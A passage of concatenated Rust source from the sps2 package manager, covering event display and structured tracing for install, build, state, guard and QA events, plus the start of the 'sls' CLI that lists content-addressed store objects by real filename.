context.package, context.version, files
),
"install",
EventSeverity::Success,
);
}
LifecycleStage::Failed => {
if let Some(failure_ctx) = failure {
let sps2_events::FailureContext {
code: _,
message: failure_message,
hint,
retryable,
} = failure_ctx;
let retry_text = if retryable { " (retryable)" } else { "" };
let mut message = format!(
"Failed to install {} {}{}: {}",
context.package, context.version, retry_text, failure_message
);
if let Some(hint) = hint.as_ref() {
message.push_str(&format!(" (hint: {hint})"));
}
self.show_operation(&meta, message, "install", EventSeverity::Error);
}
}
},
AppEvent::Package(package_event) => {
use sps2_events::{events::PackageOutcome, PackageEvent};
match package_event {
PackageEvent::OperationStarted { operation } => {
self.show_operation(
&meta,
format!("{operation:?} started"),
"package",
EventSeverity::Info,
);
}
PackageEvent::OperationCompleted { operation, outcome } => {
let message = match outcome {
PackageOutcome::List { total } => {
format!("{operation:?} completed: {total} packages")
}
PackageOutcome::Search { query, total } => {
format!("Search for '{query}' matched {total} packages")
}
PackageOutcome::Health { healthy, issues } => {
if healthy {
"Health check completed successfully".to_string()
} else if issues.is_empty() {
"Health check reported issues".to_string()
} else {
format!(
"Health check reported {} issue(s): {}",
issues.len(),
issues.join(", ")
)
}
}
PackageOutcome::SelfUpdate {
from,
to,
duration_ms,
} => {
format!(
"Self-update completed: {from} -> {to} ({:.2}s)",
duration_ms as f64 / 1000.0
)
}
PackageOutcome::Cleanup {
states_removed,
packages_removed,
duration_ms,
} => {
format!(
"Cleanup removed {states_removed} states, {packages_removed} packages ({:.2}s)",
duration_ms as f64 / 1000.0
)
}
};
self.show_operation(&meta, message, "package", EventSeverity::Success);
}
PackageEvent::OperationFailed { operation, failure } => {
let hint = failure
.hint
.as_ref()
.map(|h| format!(" (hint: {h})"))
.unwrap_or_default();
self.show_operation(
&meta,
format!("{operation:?} failed: {}{}", failure.message, hint),
"package",
EventSeverity::Error,
);
}
}
}
// State events
AppEvent::State(state_event) => {
use sps2_events::StateEvent;
match state_event {
StateEvent::TransitionStarted { context } => {
let operation = &context.operation;
let target = context.target;
self.show_operation(
&meta,
format!("State transition started ({operation} -> {target})"),
"state",
EventSeverity::Info,
);
}
StateEvent::TransitionCompleted { context, summary } => {
let source_text = context
.source
.map(|s| s.to_string())
.unwrap_or_else(|| "<none>".to_string());
let duration_text = summary
.and_then(|s| s.duration_ms)
.map(|ms| format!(" in {:.2}s", ms as f64 / 1000.0))
.unwrap_or_default();
self.show_operation(
&meta,
format!(
"State transition completed ({}: {source_text} -> {}){duration_text}",
context.operation,
context.target
),
"state",
EventSeverity::Success,
);
}
StateEvent::TransitionFailed { context, failure } => {
self.show_operation(
&meta,
format!(
"State transition failed ({} -> {}): {}",
context.operation, context.target, failure.message
),
"state",
EventSeverity::Error,
);
}
StateEvent::RollbackStarted { context } => {
self.show_operation(
&meta,
format!("Rollback started ({} -> {})", context.from, context.to),
"rollback",
EventSeverity::Info,
);
}
StateEvent::RollbackCompleted { context, summary } => {
let duration_text = summary
.and_then(|s| s.duration_ms)
.map(|ms| format!(" in {:.2}s", ms as f64 / 1000.0))
.unwrap_or_default();
self.show_operation(
&meta,
format!(
"Rollback completed ({} -> {}){duration_text}",
context.from, context.to
),
"rollback",
EventSeverity::Success,
);
}
StateEvent::RollbackFailed { context, failure } => {
self.show_operation(
&meta,
format!(
"Rollback failed ({} -> {}): {}",
context.from, context.to, failure.message
),
"rollback",
EventSeverity::Error,
);
}
StateEvent::CleanupStarted { summary } => {
let planned = summary.planned_states;
if self.debug_enabled {
self.show_operation(
&meta,
format!("Cleanup planned for {planned} states"),
"clean",
EventSeverity::Debug,
);
}
}
StateEvent::CleanupCompleted { summary } => {
let removed = summary.removed_states.unwrap_or(0);
let bytes = summary.space_freed_bytes.unwrap_or(0);
self.show_operation(
&meta,
format!(
"Cleanup completed: removed {} states, {} freed",
removed,
self.format_bytes(bytes)
),
"clean",
EventSeverity::Success,
);
}
StateEvent::CleanupFailed { summary, failure } => {
let planned = summary.planned_states;
self.show_operation(
&meta,
format!(
"Cleanup failed after planning {planned} states: {}",
failure.message
),
"clean",
EventSeverity::Error,
);
}
}
}
// Build events
AppEvent::Build(build_event) => {
use sps2_events::{BuildDiagnostic, BuildEvent, LogStream, PhaseStatus};
match build_event {
BuildEvent::Started { session, target } => {
let cache_text = if session.cache_enabled {
" (cache enabled)"
} else {
""
};
self.show_operation(
&meta,
format!(
"Build started for {} {} using {:?}{}",
target.package, target.version, session.system, cache_text
),
"build",
EventSeverity::Info,
);
}
BuildEvent::Completed {
target,
artifacts,
duration_ms,
..
} => {
let duration = std::time::Duration::from_millis(duration_ms);
let artifact_summary = if artifacts.is_empty() {
"no artifacts produced".to_string()
} else {
format!(
"{} artifact{}",
artifacts.len(),
if artifacts.len() == 1 { "" } else { "s" }
)
};
self.show_operation(
&meta,
format!(
"Build completed for {} {} in {} ({artifact_summary})",
target.package,
target.version,
format_duration(duration)
),
"build",
EventSeverity::Success,
);
}
BuildEvent::Failed {
target,
failure,
phase,
command,
..
} => {
let mut message = format!(
"Build failed for {} {}: {}{}{}",
target.package,
target.version,
failure
.code
.as_ref()
.map(|code| format!("[{code}] "))
.unwrap_or_default(),
failure.message,
failure
.hint
.as_ref()
.map(|hint| format!(" (hint: {hint})"))
.unwrap_or_default()
);
if let Some(phase) = phase {
message.push_str(&format!(" during phase {phase:?}"));
}
if let Some(command) = command {
message.push_str(&format!(" (command: {})", command.command));
}
let severity = if failure.retryable {
EventSeverity::Warning
} else {
EventSeverity::Error
};
self.show_operation(&meta, message, "build", severity);
}
BuildEvent::PhaseStatus { phase, status, .. } => match status {
PhaseStatus::Started => {
self.show_operation(
&meta,
format!("Entering build phase {phase:?}"),
"build",
EventSeverity::Info,
);
}
PhaseStatus::Completed { duration_ms } => {
let duration_text = duration_ms
.map(|ms| {
format!(
" in {}",
format_duration(std::time::Duration::from_millis(ms))
)
})
.unwrap_or_default();
self.show_operation(
&meta,
format!("Completed build phase {phase:?}{duration_text}"),
"build",
EventSeverity::Success,
);
}
},
BuildEvent::Diagnostic(diag) => match diag {
BuildDiagnostic::Warning {
message, source, ..
} => {
let source_text = source
.as_ref()
.map(|s| format!(" ({s})"))
.unwrap_or_default();
self.show_operation(
&meta,
format!("Build warning: {message}{source_text}"),
"build",
EventSeverity::Warning,
);
}
BuildDiagnostic::LogChunk { stream, text, .. } => {
let prefix = match stream {
LogStream::Stdout => "[build]",
LogStream::Stderr => "[build:stderr]",
};
for line in text.lines() {
println!("{prefix} {line}");
}
}
BuildDiagnostic::CachePruned {
removed_items,
freed_bytes,
} => {
if self.debug_enabled {
self.show_operation(
&meta,
format!(
"Build cache pruned: {removed_items} entries, {} freed",
self.format_bytes(freed_bytes)
),
"build",
EventSeverity::Debug,
);
}
}
},
}
}
// Resolver events
AppEvent::Lifecycle(LifecycleEvent::Resolver {
stage,
context,
failure,
}) => match stage {
LifecycleStage::Started => {
let mut parts = Vec::new();
let runtime_targets = context.runtime_targets.unwrap_or(0);
let build_targets = context.build_targets.unwrap_or(0);
let local_targets = context.local_targets.unwrap_or(0);
if runtime_targets > 0 {
parts.push(format!("{} runtime", runtime_targets));
}
if build_targets > 0 {
parts.push(format!("{} build", build_targets));
}
if local_targets > 0 {
parts.push(format!("{} local", local_targets));
}
if parts.is_empty() {
parts.push("no targets".to_string());
}
self.show_operation(
&meta,
format!("Resolving dependencies ({})", parts.join(", ")),
"resolve",
EventSeverity::Info,
);
}
LifecycleStage::Completed => {
let total_packages = context.total_packages.unwrap_or(0);
let downloaded_packages = context.downloaded_packages.unwrap_or(0);
let reused_packages = context.reused_packages.unwrap_or(0);
let duration_ms = context.duration_ms.unwrap_or(0);
let mut message =
format!("Resolved {} packages in {}ms", total_packages, duration_ms);
if downloaded_packages > 0 {
message.push_str(&format!(" • downloads: {}", downloaded_packages));
}
if reused_packages > 0 {
message.push_str(&format!(" • reused: {}", reused_packages));
}
self.show_operation(&meta, message, "resolve", EventSeverity::Success);
}
LifecycleStage::Failed => {
if let Some(failure_ctx) = failure {
let code_prefix = failure_ctx
.code
.as_deref()
.map(|code| format!("[{code}] "))
.unwrap_or_default();
let mut message =
format!("Resolution failed: {code_prefix}{}", failure_ctx.message);
if !context.conflicting_packages.is_empty() {
let sample = context
.conflicting_packages
.iter()
.take(3)
.cloned()
.collect::<Vec<_>>();
| rust | BSD-3-Clause | a357a9ae7317314ef1605ce29b66f064bd6eb510 | 2026-01-04T20:17:02.345249Z | true |
alexykn/sps2 | https://github.com/alexykn/sps2/blob/a357a9ae7317314ef1605ce29b66f064bd6eb510/apps/sps2/src/logging.rs | apps/sps2/src/logging.rs | //! Structured logging integration for events
//!
//! This module provides structured logging capabilities that integrate with the
//! tracing ecosystem, converting domain-specific events into appropriate log
//! records with structured fields.
use sps2_events::{AppEvent, EventMessage};
use tracing::{debug, error, info, trace, warn};
/// Log an AppEvent using the tracing infrastructure with structured fields
///
/// This function takes an AppEvent and logs it at the appropriate level with
/// structured fields that can be consumed by observability tools.
pub fn log_event_with_tracing(message: &EventMessage) {
let event = &message.event;
let meta = &message.meta;
let level = meta.tracing_level();
// Extract structured fields based on event type
match event {
// Download domain events
AppEvent::Lifecycle(sps2_events::events::LifecycleEvent::Download {
stage,
context,
failure,
}) => {
use sps2_events::events::LifecycleStage;
match stage {
LifecycleStage::Started => {
info!(
source = meta.source.as_str(),
event_id = %meta.event_id,
correlation = ?meta.correlation_id,
url = %context.url,
package = ?context.package,
total_bytes = ?context.total_bytes,
"Download started"
);
}
LifecycleStage::Completed => {
info!(
source = meta.source.as_str(),
event_id = %meta.event_id,
correlation = ?meta.correlation_id,
url = %context.url,
package = ?context.package,
bytes_downloaded = ?context.bytes_downloaded,
"Download completed"
);
}
LifecycleStage::Failed => {
if let Some(failure_ctx) = failure {
error!(
source = meta.source.as_str(),
event_id = %meta.event_id,
correlation = ?meta.correlation_id,
url = %context.url,
package = ?context.package,
retryable = failure_ctx.retryable,
code = ?failure_ctx.code,
message = %failure_ctx.message,
hint = ?failure_ctx.hint,
"Download failed"
);
}
}
}
}
AppEvent::Build(build_event) => {
use sps2_events::{BuildDiagnostic, BuildEvent, LogStream, PhaseStatus};
match build_event {
BuildEvent::Started { session, target } => {
info!(
source = meta.source.as_str(),
event_id = %meta.event_id,
correlation = ?meta.correlation_id,
package = %target.package,
version = %target.version,
system = ?session.system,
cache_enabled = session.cache_enabled,
"Build started"
);
}
BuildEvent::Completed {
target,
artifacts,
duration_ms,
..
} => {
info!(
source = meta.source.as_str(),
event_id = %meta.event_id,
correlation = ?meta.correlation_id,
package = %target.package,
version = %target.version,
artifacts = artifacts.len(),
duration_ms,
"Build completed"
);
}
BuildEvent::Failed {
target,
failure,
phase,
command,
..
} => {
if failure.retryable {
warn!(
source = meta.source.as_str(),
event_id = %meta.event_id,
correlation = ?meta.correlation_id,
package = %target.package,
version = %target.version,
phase = ?phase,
command = ?command.as_ref().map(|c| &c.command),
retryable = failure.retryable,
code = ?failure.code,
message = %failure.message,
hint = ?failure.hint,
"Build failed",
);
} else {
error!(
source = meta.source.as_str(),
event_id = %meta.event_id,
correlation = ?meta.correlation_id,
package = %target.package,
version = %target.version,
phase = ?phase,
command = ?command.as_ref().map(|c| &c.command),
retryable = failure.retryable,
code = ?failure.code,
message = %failure.message,
hint = ?failure.hint,
"Build failed",
);
}
}
BuildEvent::PhaseStatus { phase, status, .. } => match status {
PhaseStatus::Started => {
info!(
source = meta.source.as_str(),
event_id = %meta.event_id,
correlation = ?meta.correlation_id,
phase = ?phase,
"Build phase started"
);
}
PhaseStatus::Completed { duration_ms } => {
info!(
source = meta.source.as_str(),
event_id = %meta.event_id,
correlation = ?meta.correlation_id,
phase = ?phase,
duration_ms,
"Build phase completed"
);
}
},
BuildEvent::Diagnostic(diag) => match diag {
BuildDiagnostic::Warning {
message,
source: warn_source,
..
} => {
warn!(
source = meta.source.as_str(),
event_id = %meta.event_id,
correlation = ?meta.correlation_id,
diagnostic_source = ?warn_source,
message = %message,
"Build warning",
);
}
BuildDiagnostic::LogChunk { stream, text, .. } => match stream {
LogStream::Stdout => {
debug!(
source = meta.source.as_str(),
event_id = %meta.event_id,
correlation = ?meta.correlation_id,
stream = "stdout",
text = %text,
"Build output"
);
}
LogStream::Stderr => {
debug!(
source = meta.source.as_str(),
event_id = %meta.event_id,
correlation = ?meta.correlation_id,
stream = "stderr",
text = %text,
"Build output"
);
}
},
BuildDiagnostic::CachePruned {
removed_items,
freed_bytes,
} => {
debug!(
source = meta.source.as_str(),
event_id = %meta.event_id,
correlation = ?meta.correlation_id,
removed_items,
freed_bytes,
"Build cache pruned"
);
}
},
}
}
AppEvent::Guard(guard_event) => {
use sps2_events::{GuardEvent, GuardScope, GuardSeverity};
fn scope_label(scope: &GuardScope) -> String {
match scope {
GuardScope::System => "system".to_string(),
GuardScope::Package { name, version } => version
.as_ref()
.map(|v| format!("{name}:{v}"))
.unwrap_or_else(|| name.clone()),
GuardScope::Path { path } => path.clone(),
GuardScope::State { id } => format!("state {id}"),
GuardScope::Custom { description } => description.clone(),
}
}
match guard_event {
GuardEvent::VerificationStarted {
scope,
level,
targets,
..
} => {
info!(
source = meta.source.as_str(),
event_id = %meta.event_id,
correlation = ?meta.correlation_id,
scope = %scope_label(scope),
level = ?level,
packages = targets.packages,
files = ?targets.files,
"Guard verification started"
);
}
GuardEvent::VerificationCompleted {
scope,
discrepancies,
metrics,
..
} => {
if *discrepancies == 0 {
info!(
source = meta.source.as_str(),
event_id = %meta.event_id,
correlation = ?meta.correlation_id,
scope = %scope_label(scope),
coverage = metrics.coverage_percent,
cache_hit_rate = metrics.cache_hit_rate,
duration_ms = metrics.duration_ms,
"Guard verification completed",
);
} else {
warn!(
source = meta.source.as_str(),
event_id = %meta.event_id,
correlation = ?meta.correlation_id,
scope = %scope_label(scope),
discrepancies = *discrepancies,
coverage = metrics.coverage_percent,
cache_hit_rate = metrics.cache_hit_rate,
duration_ms = metrics.duration_ms,
"Guard verification completed with findings",
);
}
}
GuardEvent::VerificationFailed { scope, failure, .. } => {
if failure.retryable {
warn!(
source = meta.source.as_str(),
event_id = %meta.event_id,
correlation = ?meta.correlation_id,
scope = %scope_label(scope),
retryable = failure.retryable,
code = ?failure.code,
message = %failure.message,
hint = ?failure.hint,
"Guard verification failed",
);
} else {
error!(
source = meta.source.as_str(),
event_id = %meta.event_id,
correlation = ?meta.correlation_id,
scope = %scope_label(scope),
retryable = failure.retryable,
code = ?failure.code,
message = %failure.message,
hint = ?failure.hint,
"Guard verification failed",
);
}
}
GuardEvent::HealingStarted { plan, .. } => {
info!(
source = meta.source.as_str(),
event_id = %meta.event_id,
correlation = ?meta.correlation_id,
total = plan.total,
auto = plan.auto_heal,
confirmation = plan.confirmation_required,
manual = plan.manual_only,
"Guard healing started",
);
}
GuardEvent::HealingCompleted {
healed,
failed,
duration_ms,
..
} => {
if *failed == 0 {
info!(
source = meta.source.as_str(),
event_id = %meta.event_id,
correlation = ?meta.correlation_id,
healed = *healed,
failed = *failed,
duration_ms = *duration_ms,
"Guard healing completed",
);
} else {
warn!(
source = meta.source.as_str(),
event_id = %meta.event_id,
correlation = ?meta.correlation_id,
healed = *healed,
failed = *failed,
duration_ms = *duration_ms,
"Guard healing completed with failures",
);
}
}
GuardEvent::HealingFailed {
failure, healed, ..
} => {
if failure.retryable {
warn!(
source = meta.source.as_str(),
event_id = %meta.event_id,
correlation = ?meta.correlation_id,
healed = *healed,
retryable = failure.retryable,
code = ?failure.code,
message = %failure.message,
hint = ?failure.hint,
"Guard healing failed",
);
} else {
error!(
source = meta.source.as_str(),
event_id = %meta.event_id,
correlation = ?meta.correlation_id,
healed = *healed,
retryable = failure.retryable,
code = ?failure.code,
message = %failure.message,
hint = ?failure.hint,
"Guard healing failed",
);
}
}
GuardEvent::DiscrepancyReported { discrepancy, .. } => {
let severity = match discrepancy.severity {
GuardSeverity::Critical => "critical",
GuardSeverity::High => "high",
GuardSeverity::Medium => "medium",
GuardSeverity::Low => "low",
};
warn!(
source = meta.source.as_str(),
event_id = %meta.event_id,
correlation = ?meta.correlation_id,
severity,
kind = %discrepancy.kind,
location = ?discrepancy.location,
package = ?discrepancy.package,
version = ?discrepancy.version,
auto_heal = discrepancy.auto_heal_available,
confirmation = discrepancy.requires_confirmation,
message = %discrepancy.message,
"Guard discrepancy reported",
);
}
}
}
AppEvent::Lifecycle(sps2_events::events::LifecycleEvent::Resolver {
stage,
context,
failure,
}) => {
use sps2_events::events::LifecycleStage;
match stage {
LifecycleStage::Started => {
info!(
source = meta.source.as_str(),
event_id = %meta.event_id,
correlation = ?meta.correlation_id,
runtime_targets = ?context.runtime_targets,
build_targets = ?context.build_targets,
local_targets = ?context.local_targets,
"Dependency resolution started"
);
}
LifecycleStage::Completed => {
info!(
source = meta.source.as_str(),
event_id = %meta.event_id,
correlation = ?meta.correlation_id,
total_packages = ?context.total_packages,
downloaded_packages = ?context.downloaded_packages,
reused_packages = ?context.reused_packages,
duration_ms = ?context.duration_ms,
"Dependency resolution completed"
);
}
LifecycleStage::Failed => {
if let Some(failure_ctx) = failure {
if failure_ctx.retryable {
warn!(
source = meta.source.as_str(),
event_id = %meta.event_id,
correlation = ?meta.correlation_id,
retryable = failure_ctx.retryable,
code = ?failure_ctx.code,
message = %failure_ctx.message,
hint = ?failure_ctx.hint,
conflicts = ?context.conflicting_packages,
"Dependency resolution failed"
);
} else {
error!(
source = meta.source.as_str(),
event_id = %meta.event_id,
correlation = ?meta.correlation_id,
retryable = failure_ctx.retryable,
code = ?failure_ctx.code,
message = %failure_ctx.message,
hint = ?failure_ctx.hint,
conflicts = ?context.conflicting_packages,
"Dependency resolution failed"
);
}
}
}
}
}
// Install domain events
AppEvent::Lifecycle(sps2_events::events::LifecycleEvent::Install {
stage,
context,
failure,
}) => {
use sps2_events::events::LifecycleStage;
match stage {
LifecycleStage::Started => {
info!(
source = meta.source.as_str(),
event_id = %meta.event_id,
correlation = ?meta.correlation_id,
package = ?context.package,
version = ?context.version,
"Package installation started"
);
}
LifecycleStage::Completed => {
info!(
source = meta.source.as_str(),
event_id = %meta.event_id,
correlation = ?meta.correlation_id,
package = ?context.package,
version = ?context.version,
files_installed = ?context.files_installed,
"Package installation completed"
);
}
LifecycleStage::Failed => {
if let Some(failure_ctx) = failure {
error!(
source = meta.source.as_str(),
event_id = %meta.event_id,
correlation = ?meta.correlation_id,
package = ?context.package,
version = ?context.version,
retryable = failure_ctx.retryable,
code = ?failure_ctx.code,
message = %failure_ctx.message,
hint = ?failure_ctx.hint,
"Package installation failed"
);
}
}
}
}
// Uninstall domain events
AppEvent::Lifecycle(sps2_events::events::LifecycleEvent::Uninstall {
stage,
context,
failure,
}) => {
use sps2_events::events::LifecycleStage;
match stage {
LifecycleStage::Started => {
info!(
source = meta.source.as_str(),
event_id = %meta.event_id,
correlation = ?meta.correlation_id,
package = ?context.package,
version = ?context.version,
"Package uninstallation started"
);
}
LifecycleStage::Completed => {
info!(
source = meta.source.as_str(),
event_id = %meta.event_id,
correlation = ?meta.correlation_id,
package = ?context.package,
version = ?context.version,
files_removed = ?context.files_removed,
"Package uninstallation completed"
);
}
LifecycleStage::Failed => {
if let Some(failure_ctx) = failure {
if failure_ctx.retryable {
warn!(
source = meta.source.as_str(),
event_id = %meta.event_id,
correlation = ?meta.correlation_id,
package = ?context.package,
version = ?context.version,
retryable = failure_ctx.retryable,
code = ?failure_ctx.code,
message = %failure_ctx.message,
hint = ?failure_ctx.hint,
"Package uninstallation failed"
);
} else {
error!(
source = meta.source.as_str(),
event_id = %meta.event_id,
correlation = ?meta.correlation_id,
package = ?context.package,
version = ?context.version,
retryable = failure_ctx.retryable,
code = ?failure_ctx.code,
message = %failure_ctx.message,
hint = ?failure_ctx.hint,
"Package uninstallation failed"
);
}
}
}
}
}
AppEvent::Qa(qa_event) => {
use sps2_events::{events::QaCheckStatus, QaEvent};
match qa_event {
QaEvent::PipelineStarted { target, level } => {
info!(
source = meta.source.as_str(),
event_id = %meta.event_id,
correlation = ?meta.correlation_id,
package = %target.package,
version = %target.version,
level = ?level,
"QA pipeline started"
);
}
QaEvent::PipelineCompleted {
target,
total_checks,
passed,
failed,
duration_ms,
} => {
info!(
source = meta.source.as_str(),
event_id = %meta.event_id,
correlation = ?meta.correlation_id,
package = %target.package,
version = %target.version,
total_checks = total_checks,
passed = passed,
failed = failed,
duration_ms = duration_ms,
"QA pipeline completed"
);
}
QaEvent::PipelineFailed { target, failure } => {
error!(
source = meta.source.as_str(),
event_id = %meta.event_id,
correlation = ?meta.correlation_id,
package = %target.package,
version = %target.version,
code = ?failure.code,
retryable = failure.retryable,
hint = ?failure.hint,
message = %failure.message,
"QA pipeline failed"
);
}
QaEvent::CheckEvaluated { summary, .. } => {
let status_str = format!("{:?}", summary.status);
let severity = match summary.status {
QaCheckStatus::Passed => tracing::Level::INFO,
QaCheckStatus::Failed => tracing::Level::ERROR,
QaCheckStatus::Skipped => tracing::Level::DEBUG,
};
match severity {
tracing::Level::ERROR => error!(
source = meta.source.as_str(),
event_id = %meta.event_id,
correlation = ?meta.correlation_id,
check_name = %summary.name,
category = %summary.category,
status = %status_str,
findings = summary.findings.len(),
duration_ms = summary.duration_ms,
"QA check evaluated"
),
tracing::Level::DEBUG => debug!(
source = meta.source.as_str(),
event_id = %meta.event_id,
correlation = ?meta.correlation_id,
check_name = %summary.name,
category = %summary.category,
status = %status_str,
findings = summary.findings.len(),
duration_ms = summary.duration_ms,
"QA check evaluated"
),
_ => info!(
source = meta.source.as_str(),
event_id = %meta.event_id,
correlation = ?meta.correlation_id,
check_name = %summary.name,
category = %summary.category,
status = %status_str,
findings = summary.findings.len(),
duration_ms = summary.duration_ms,
"QA check evaluated"
),
}
}
}
}
AppEvent::Package(package_event) => {
use sps2_events::PackageEvent;
match package_event {
PackageEvent::OperationStarted { operation } => {
info!(
source = meta.source.as_str(),
event_id = %meta.event_id,
correlation = ?meta.correlation_id,
operation = ?operation,
"Package operation started"
);
}
PackageEvent::OperationCompleted { operation, outcome } => {
info!(
source = meta.source.as_str(),
event_id = %meta.event_id,
correlation = ?meta.correlation_id,
operation = ?operation,
outcome = ?outcome,
"Package operation completed"
);
}
PackageEvent::OperationFailed { operation, failure } => {
error!(
source = meta.source.as_str(),
event_id = %meta.event_id,
correlation = ?meta.correlation_id,
operation = ?operation,
code = ?failure.code,
retryable = failure.retryable,
hint = ?failure.hint,
message = %failure.message,
"Package operation failed"
);
}
}
}
// State domain events
AppEvent::State(state_event) => {
use sps2_events::StateEvent;
match state_event {
StateEvent::TransitionStarted { context } => {
info!(
source = meta.source.as_str(),
event_id = %meta.event_id,
correlation = ?meta.correlation_id,
operation = %context.operation,
source_state = ?context.source,
target_state = %context.target,
"State transition started"
);
}
StateEvent::TransitionCompleted { context, summary } => {
info!(
source = meta.source.as_str(),
event_id = %meta.event_id,
correlation = ?meta.correlation_id,
operation = %context.operation,
source_state = ?context.source,
target_state = %context.target,
duration_ms = summary.as_ref().and_then(|s| s.duration_ms),
"State transition completed"
);
}
StateEvent::TransitionFailed { context, failure } => {
error!(
| rust | BSD-3-Clause | a357a9ae7317314ef1605ce29b66f064bd6eb510 | 2026-01-04T20:17:02.345249Z | true |
alexykn/sps2 | https://github.com/alexykn/sps2/blob/a357a9ae7317314ef1605ce29b66f064bd6eb510/apps/sls/src/main.rs | apps/sls/src/main.rs | #![warn(mismatched_lifetime_syntaxes)]
//! sls - Store List utility for sps2
//!
//! A simple ls-like tool to explore the content-addressed store
use clap::Parser;
use sps2_config::fixed_paths;
use sps2_state::create_pool;
use sqlx::Acquire;
use std::collections::HashMap;
use std::io::IsTerminal;
use std::path::{Path, PathBuf};
use tokio::fs;
// Command-line interface for `sls`.
//
// NOTE: the `///` doc comments on fields double as clap help text shown by
// `--help`; keep them short and user-facing. Internal commentary below uses
// plain `//` so it never leaks into the generated help output.
#[derive(Parser)]
#[command(name = "sls")]
#[command(about = "List store contents with real filenames", long_about = None)]
struct Cli {
    /// Path or hash prefix to list
    path: Option<String>,
    /// Use a long listing format (shows permissions, size, etc)
    #[arg(short, long)]
    long: bool,
    /// Show only hash without filename mapping
    #[arg(long)]
    hash: bool,
    /// List subdirectories recursively
    #[arg(short = 'R', long)]
    recursive: bool,
    /// Store path (defaults to /opt/pm/store)
    #[arg(long)]
    store: Option<PathBuf>,
    /// Database path (defaults to /opt/pm/state.sqlite)
    #[arg(long)]
    db: Option<PathBuf>,
    // NOTE(review): `-a/--all` is declared but not read anywhere in this file —
    // confirm whether dot-file filtering was ever implemented or drop the flag.
    /// Show all entries (including . files)
    #[arg(short, long)]
    all: bool,
    /// Disable colored output
    #[arg(long)]
    no_color: bool,
    /// List packages instead of objects
    #[arg(short = 'p', long = "packages")]
    packages: bool,
}
#[tokio::main]
async fn main() -> Result<(), Box<dyn std::error::Error>> {
    // Exit cleanly when stdout is closed (e.g. piped into `head`): restore the
    // default SIGPIPE disposition so the process terminates instead of
    // surfacing broken-pipe write errors.
    #[cfg(unix)]
    unsafe {
        // SAFETY: plain libc call installing the default handler; no Rust
        // invariants depend on the previous signal disposition.
        libc::signal(libc::SIGPIPE, libc::SIG_DFL);
    }
    let cli = Cli::parse();
    let store_path = cli
        .store
        .unwrap_or_else(|| PathBuf::from(fixed_paths::STORE_DIR));
    let db_path = cli
        .db
        .unwrap_or_else(|| PathBuf::from(fixed_paths::DB_PATH));
    // Colorize only when explicitly allowed and writing to a real terminal.
    let use_color = !cli.no_color && std::io::stdout().is_terminal();
    if cli.packages {
        // Package view: translate store package directories to name:version.
        let package_map = load_package_mappings(&db_path).await?;
        match cli.path {
            Some(prefix) => {
                list_specific_package(&store_path, &prefix, &package_map, cli.long, use_color)
                    .await?;
            }
            None => {
                list_packages(
                    &store_path,
                    &package_map,
                    cli.long,
                    cli.recursive,
                    use_color,
                )
                .await?;
            }
        }
    } else {
        // Object view: translate content hashes back to real file paths.
        let file_map = load_file_mappings(&db_path).await?;
        match cli.path {
            Some(target) => {
                list_specific(
                    &store_path,
                    &target,
                    &file_map,
                    cli.long,
                    cli.hash,
                    cli.recursive,
                    use_color,
                )
                .await?;
            }
            None => {
                list_store(
                    &store_path,
                    &file_map,
                    cli.long,
                    cli.hash,
                    cli.recursive,
                    use_color,
                )
                .await?;
            }
        }
    }
    Ok(())
}
/// Build a map from content hash to every `relative/path (package:version)`
/// string that references it, covering all packages tracked in the database.
///
/// # Errors
///
/// Returns an error if the database cannot be opened or the query fails.
async fn load_file_mappings(
    db_path: &Path,
) -> Result<HashMap<String, Vec<String>>, Box<dyn std::error::Error>> {
    let mut map: HashMap<String, Vec<String>> = HashMap::new();
    // Open database connection using state crate
    let pool = create_pool(db_path).await?;
    let mut conn = pool.acquire().await?;
    let mut tx = conn.begin().await?;
    // For now, we'll still use a raw query since we need ALL mappings
    // In the future, we could add a batch function to the state crate
    use sqlx::Row;
    let rows = sqlx::query(
        r#"
        SELECT DISTINCT
            pfe.file_hash,
            pfe.relative_path,
            p.name as package_name,
            p.version as package_version
        FROM package_file_entries pfe
        JOIN packages p ON p.id = pfe.package_id
        ORDER BY pfe.file_hash, pfe.relative_path
        "#,
    )
    .fetch_all(&mut *tx)
    .await?;
    for row in rows {
        let file_hash: String = row.get("file_hash");
        let relative_path: String = row.get("relative_path");
        let package_name: String = row.get("package_name");
        let package_version: String = row.get("package_version");
        let entry = format!("{relative_path} ({package_name}:{package_version})");
        // One hash may back many files (deduplicated store), hence Vec values.
        // `or_default` replaces the noisier `or_insert_with(Vec::new)` idiom.
        map.entry(file_hash).or_default().push(entry);
    }
    tx.commit().await?;
    Ok(map)
}
/// List the top of the object store: either recurse through the whole
/// `objects/` tree, or print just its first-level fan-out directories.
async fn list_store(
    store_path: &Path,
    file_map: &HashMap<String, Vec<String>>,
    long_format: bool,
    hash_only: bool,
    recursive: bool,
    use_color: bool,
) -> Result<(), Box<dyn std::error::Error>> {
    let objects_dir = store_path.join("objects");
    if recursive {
        list_recursive(&objects_dir, file_map, long_format, hash_only, use_color, 0).await?;
        return Ok(());
    }
    // Non-recursive: collect the first-level directory names, then print sorted.
    let mut reader = fs::read_dir(&objects_dir).await?;
    let mut dir_names = Vec::new();
    while let Some(item) = reader.next_entry().await? {
        if item.file_type().await?.is_dir() {
            dir_names.push(item.file_name().to_string_lossy().to_string());
        }
    }
    dir_names.sort();
    for name in &dir_names {
        println!("{}/", style_blue(name, use_color));
    }
    Ok(())
}
/// Recursively walk `dir`, printing subdirectories and hash-named files.
///
/// `depth` controls the per-level indentation. Files in the object store are
/// named by their full content hash; `file_map` translates a hash back to the
/// real file paths (and owning packages) recorded in the database, printing
/// one line per referencing file. Hashes absent from the map print `(unknown)`.
async fn list_recursive(
    dir: &Path,
    file_map: &HashMap<String, Vec<String>>,
    long_format: bool,
    hash_only: bool,
    use_color: bool,
    depth: usize,
) -> Result<(), Box<dyn std::error::Error>> {
    let indent = " ".repeat(depth);
    let mut entries = fs::read_dir(dir).await?;
    let mut items = Vec::new();
    while let Some(entry) = entries.next_entry().await? {
        items.push(entry);
    }
    // Sort entries
    items.sort_by_key(|e| e.file_name());
    for entry in items {
        let metadata = entry.metadata().await?;
        let name = entry.file_name().to_string_lossy().to_string();
        if metadata.is_dir() {
            println!("{indent}{}/", style_blue(&name, use_color));
            // Recursive listing handled at top level
            // Box::pin is required: a recursive async fn produces a future of
            // unknown size, so the recursive call must be heap-pinned.
            Box::pin(list_recursive(
                &entry.path(),
                file_map,
                long_format,
                hash_only,
                use_color,
                depth + 1,
            ))
            .await?;
        } else {
            // It's a file - the filename is the hash
            let full_hash = &name;
            if hash_only {
                println!("{indent}{full_hash}");
            } else if long_format {
                // Long format: permissions + size + truncated hash + mapping.
                let size = format_size(metadata.len());
